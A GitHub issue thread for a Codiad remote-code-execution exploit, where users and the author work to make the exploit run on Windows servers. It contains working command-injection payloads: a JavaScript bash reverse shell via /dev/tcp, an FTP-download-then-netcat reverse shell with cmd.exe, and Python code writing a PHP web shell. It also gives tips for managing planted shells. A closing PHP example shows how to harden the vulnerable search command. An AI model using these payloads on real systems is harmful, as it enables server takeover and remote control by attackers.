
error on class.filemanager.php line 208

Open REPTILEHAUS opened this issue 6 years ago • 24 comments

Hey man - I'm coming up against this issue at the moment, any ideas?

<b>Notice</b>:  Undefined index: type in <b>C:\xampp\htdocs\development\components\filemanager\class.filemanager.php</b> on line <b>208</b><br />

REPTILEHAUS avatar Dec 04 '17 02:12 REPTILEHAUS

Hi, guy. Actually, I haven't tested this payload on any Windows server; it works on Linux. But now I am a little busy, so I will tell you how to find the reason for this error. If you have learned the PHP language, you will be able to debug this error. For solving this problem, you should use the debug functions of PHP, such as print_r, var_dump..., and see how this error occurred. Thank you.

WangYihang avatar Dec 04 '17 04:12 WangYihang

I got the same error that REPTILEHAUS gets.

ozgur2357 avatar Dec 23 '17 14:12 ozgur2357

@ozgur2357 okay, I got it, I will review it right now, thank you for reporting

WangYihang avatar Dec 23 '17 15:12 WangYihang

@ozgur2357 Could you offer me some information about your operating system version, PHP version or Codiad version? That will help a lot in solving this problem. Thank you, bro.

WangYihang avatar Dec 23 '17 15:12 WangYihang

@WangYihang Of course: Windows 7 Professional Edition Service Pack 1, PHP version 5.6.12 with XAMPP.

ozgur2357 avatar Dec 23 '17 15:12 ozgur2357

Look, I just changed the source code of the file ROOT/components/filemanager/class.filemanager.php#line244


then used exploit.js to exploit it, and the browser reported:

<br />
<b>Notice</b>:  Undefined index: type in <b>C:\phpStudy\PHPTutorial\WWW\components\filemanager\class.filemanager.php</b> on line <b>238</b><br />

But the evil code actually has been executed.


My environment is:

php 5.4.45
windows 10
codiad 2.8.3

WangYihang avatar Dec 23 '17 15:12 WangYihang

I got the reason: I have not added the GET arg type in the URL, but this arg does not affect us getting a reverse shell; you can see the evil command has actually been executed. The main reason that you didn't get a reverse shell is that the evil code is written for Linux (because Windows does not have bash).

WangYihang avatar Dec 23 '17 15:12 WangYihang

This exploitation is based on a technique named command injection, but it didn't work for the Windows OS sometimes. Maybe we can search the web with keywords such as "command injection on windows".

WangYihang avatar Dec 23 '17 15:12 WangYihang

Look, I got some way to inject commands on the Windows platform, just like this:

C:\phpStudy\PHPTutorial\WWW>find -L .\ -iregex "*" & dir & echo "*"
找不到文件 - -L
找不到文件 - .\
找不到文件 - -IREGEX
 驱动器 C 中的卷没有标签。
 卷的序列号是 CE19-C138

 C:\phpStudy\PHPTutorial\WWW 的目录

2017/12/23  23:41    <DIR>          .
2017/12/23  23:41    <DIR>          ..
2017/07/26  01:53               567 .editorconfig
2017/07/26  01:53               173 .gitignore

The old exploitation is designed for Linux because we are able to inject commands with \n on the Linux platform:

ip="8.8.8.8";
port="8888";
$.get(
	"/components/project/controller.php?action=get_current",
	function(d){
		p=JSON.parse(d)['data']['path'];
		$.post(
			"/components/filemanager/controller.php?action=search&path="+p,
			{"search_file_type":"\"\n/bin/bash -c 'sh -i >&/dev/tcp/"+ip+"/"+port+" 0>&1'\ngrep \"",}
		);
	}
);

So, we just need to change the exploit to make it fit on Windows:

ip="8.8.8.8";
port="8888";
command="dir";
$.get(
	"/components/project/controller.php?action=get_current",
	function(d){
		p=JSON.parse(d)['data']['path'];
		$.post(
			"/components/filemanager/controller.php?action=search&path="+p,
			{"search_file_type":'*"&'+command+'&echo "'}
		);
	}
);


Unfortunately we can not get the output of this command dir. How can we prove it? Using ping, just give it a try: so I changed the var command to command="ping SERVER_IP"; then used tcpdump to listen on the server SERVER_IP.



Got it, now we are able to execute any command on the Windows platform, cool.

WangYihang avatar Dec 23 '17 16:12 WangYihang

That's so cool, let's try to find some way to get a reverse shell on Windows. Because the Windows platform does not have bash, we can not use the bash built-in function to build a reverse shell; maybe we can use Python or other binaries, or we can use PowerShell to generate a reverse shell.

WangYihang avatar Dec 23 '17 16:12 WangYihang

Hi WangYihang, yes, I managed to ping the way you said, cool, thanks. Now I am thinking how to get a shell now, like you.

ozgur2357 avatar Dec 23 '17 16:12 ozgur2357

How about uploading nc.exe for Windows via FTP? But ftp is an interactive app.

ozgur2357 avatar Dec 23 '17 17:12 ozgur2357

Of course you can use nc.exe or some other binary virus. You can learn how to download a file with Windows cmd.exe from the following URL:

https://superuser.com/questions/59465/is-it-possible-to-download-using-the-windows-command-line

WangYihang avatar Dec 23 '17 17:12 WangYihang

To download a binary from an FTP server via the PHP function shell_exec, we just need to let it type the following words:

ftp 192.168.1.143
admin
admin
get nc.exe
quit

Then the file will be stored in the current directory, so now we are able to get a reverse shell while using it:

nc 8.8.8.8 8888 -e cmd.exe

To make it possible, because the ftp server is an interactive app, we should put all the commands into a temp file, just like this:

admin
admin
get nc.exe
quit

How to use it? Yeah, using input stream redirection:

ftp 127.0.0.1 < command.txt

How to create the file command.txt? Just use:

C:\Users\Sun\Desktop\test>echo firstline > command.txt

C:\Users\Sun\Desktop\test>echo secondline >> command.txt

C:\Users\Sun\Desktop\test>type command.txt
firstline
secondline

So, that's the solution. Thank you. @ozgur2357 @REPTILEHAUS

WangYihang avatar Dec 24 '17 01:12 WangYihang

Hi Wang, so we should be able to update the code and use it for Windows, right? Can you update your code for Windows 7?

totoroha avatar Jan 14 '18 23:01 totoroha

Okay, I will try it these days in many ways. On Mon, Jan 15, 2018 at 7:25 AM totoroha [email protected] wrote:

hi Wang, so we should be able to update the code and use it for windows right? can you update your code for windows 7?

— You are receiving this because you were mentioned.

Reply to this email directly, view it on GitHub https://github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit/issues/2#issuecomment-357551771, or mute the thread https://github.com/notifications/unsubscribe-auth/AQIkhAWpsOpt_xY212z942DOxLpL7vASks5tKozxgaJpZM4Q0Cen .

WangYihang avatar Jan 16 '18 01:01 WangYihang

Hello Wang, I am really interested in this as well. Do you think you will be able to rework the code anytime soon? Any chance to have a Windows-based Python exploit? Many thanks!

kienast avatar Jan 16 '18 10:01 kienast

@kienast I will try, but actually, a lot of Windows servers will not have Python installed... so maybe we should use some cmd built-in commands... to make the exploitation more robust.

WangYihang avatar Jan 16 '18 12:01 WangYihang

No problem, just let us know if someone can test this so we can have a sort of step-by-step guide for a Windows machine, that would be awesome! Thanks.

kienast avatar Jan 16 '18 12:01 kienast

@ozgur2357 @kienast @totoroha @REPTILEHAUS Hey guys, the Windows platform with Codiad (<2.8.4) installed is now available to be exploited, thanks to @mhaskar's excellent work. (The Python version and the JavaScript version are under development.)

WangYihang avatar Mar 06 '18 13:03 WangYihang

@WangYihang, thanks again man, best of luck and we will keep in touch!

mhaskar avatar Mar 06 '18 23:03 mhaskar

Hi @mhaskar @WangYihang, I am still getting an error saying: Notice: Undefined index: type in C:\xampp\htdocs\development\components\filemanager\class.filemanager.php on line 208 {"status":"error","message":"No Results Returned"}

My environment is Windows running Codiad. Can you please help?

Have edited the code as below:

def exploit(domain, username, password, ip, port, path):
    global session
    url = domain + "components/filemanager/controller.php?action=search&path=%s" % (path)
    #payload = '''SniperOJ%22%0A%2Fbin%2Fbash+-c+'sh+-i+%3E%26%2Fdev%2Ftcp%2F'''+ip+'''%2F'''+port+'''+0%3E%261'%0Agrep+%22SniperOJ'''
    # This is the full payload for windows which escape the command string and execute the command calc.exe
    # You can replace calc.exe with any command , for example you can use the following command to upload php cmd shell with cmd parameter
    payload_windows = '''askar"%26echo "askar" > C:/xampp/htdocs/z2.php echo ""'''
    windows_payload = 'Hacker"%26cmd.exe echo""'
    data = "search_string=Hacker&search_file_type=" + windows_payload
    headers = {"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"}
    response = session.post(url, data=data, headers=headers)
    content = response.content
    if content == '''{"status":"error","message":"No Results Returned"}''':
        print "[-] If you see this message immediately, three reasons:"
        print "\t[+] 1. You just have exited the reverse shell."
        print "\t[+] 2. The target server cannot access your vps server."
        print "\t[+] 3. You haven't started listening in port "+port+" on your vps server, so connection fails."

anishmi123 avatar Mar 12 '18 05:03 anishmi123

Got it, I will check it tonight, and thank you for your reporting.


WangYihang avatar Mar 13 '18 01:03 WangYihang

Here are some steps that may be helpful for you:

  1. Check whether the target file (C:/xampp/htdocs/z2.php) exists. If yes, then check the content; if the web shell is written into it, you succeed! You can use some web shell connection tool to manage the server, such as (antSword/中国菜刀).
  2. Check whether the target folder (C:/xampp/htdocs/) exists; if not, please replace it with the correct folder, which must be writable and accessible on the web.
  3. If you are able to read/write PHP code, please locate the file https://github.com/Codiad/Codiad/blob/master/components/filemanager/class.filemanager.php#L243, then change the shell_exec function to var_dump/print_r/echo or some other print function, then execute the exploit script again. You can then receive the command to execute; I think if you just put the command in your terminal (cmd), you will figure out the reason. (PS: step 3 is a very important method in debugging or discovering vulnerabilities. You can also use another IDE with a PHP debugger, such as PHPStorm/Eclipse...)

If you have already followed the three steps and still not found the reason, please inform me. Finally, thank you for your report and keep in touch.

Best


WangYihang avatar Mar 13 '18 12:03 WangYihang
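Two points from the discussion above fit together: the root-cause explanation earlier in the thread (the "Undefined index: type" notice only means the GET parameter type is missing; the actual injection rides on search_file_type, breaking out of the quoted find pattern with \n on Linux and with & under cmd.exe) and step 3 of the debugging advice (replace shell_exec with a print function and look at the command that was about to run). The following is an added example that is not Codiad's code and not from this thread; the function names, the grep tail of the command and the sample values are assumptions made for illustration. It shows the unsafe concatenation pattern beside a hardened handler that allowlists the filter and passes every user-controlled value through escapeshellarg().

```php
<?php
// Added example, not Codiad's code: a search handler in the shape the thread
// describes (the search_file_type value lands inside a quoted find -iregex
// pattern that is handed to shell_exec), first unsafe, then hardened.
// Function names, the grep tail and the sample values are assumptions.

declare(strict_types=1);

// Unsafe: the untrusted value is concatenated straight into the command. A `"`
// in the value closes the pattern; after that `&` starts a new command under
// cmd.exe and a newline does the same under sh, which is exactly the Linux
// versus Windows difference discussed in the thread.
function buildSearchCommandUnsafe(string $path, string $fileType, string $searchString): string
{
    return 'find -L ' . $path . ' -iregex "' . $fileType . '" -type f -print0'
        . ' | xargs -0 grep -li "' . $searchString . '"';
}

// Hardened: reject anything that does not look like a file-type glob, and
// still pass every user-controlled value through escapeshellarg() so the
// shell receives each one as a single argument whatever it contains.
function buildSearchCommandSafe(string $path, string $fileType, string $searchString): string
{
    // Allowlist for the filter: letters, digits, dot, star, underscore, dash.
    // Rejecting is safer than trying to strip "bad" characters.
    if (!preg_match('/^[A-Za-z0-9.*_-]{1,64}$/', $fileType)) {
        throw new InvalidArgumentException('invalid search_file_type');
    }
    // $path normally comes from the project record; treat it as untrusted anyway.
    return 'find -L ' . escapeshellarg($path) . ' -iregex ' . escapeshellarg($fileType)
        . ' -type f -print0 | xargs -0 grep -li ' . escapeshellarg($searchString);
}

// Constructed sample input in the shape of the Windows payload in the thread
// (the injected command here is a harmless echo).
$path = '/var/www/workspace/demo';
$fileType = '*" & echo injected & echo "';
$needle = 'TODO';

// Step 3 of the debugging advice: print the command instead of running it.
echo "unsafe: ", buildSearchCommandUnsafe($path, $fileType, $needle), PHP_EOL;

try {
    echo "safe:   ", buildSearchCommandSafe($path, $fileType, $needle), PHP_EOL;
} catch (InvalidArgumentException $e) {
    echo "safe:   rejected (", $e->getMessage(), ")", PHP_EOL;
}

// A legitimate filter passes validation and is quoted as one argument.
echo "safe:   ", buildSearchCommandSafe($path, '*.php', $needle), PHP_EOL;
```

Run it with php example.php. Printing the commands shows what step 3 would reveal: in the unsafe string the payload's first double quote closes the -iregex pattern and leaves & echo injected & echo sitting bare on the command line, so cmd.exe runs it as further commands (a newline in the value does the same under sh). The hardened builder rejects that value outright, and for a legitimate filter such as *.php escapeshellarg() emits one quoted argument ('*.php' on Linux; on Windows it wraps the value in double quotes and blanks any embedded double quotes), so neither separator can start a second command. Better still is not to reach a shell at all: PHP 7.4+ proc_open() accepts an argv array, and a RecursiveDirectoryIterator walk needs no subprocess.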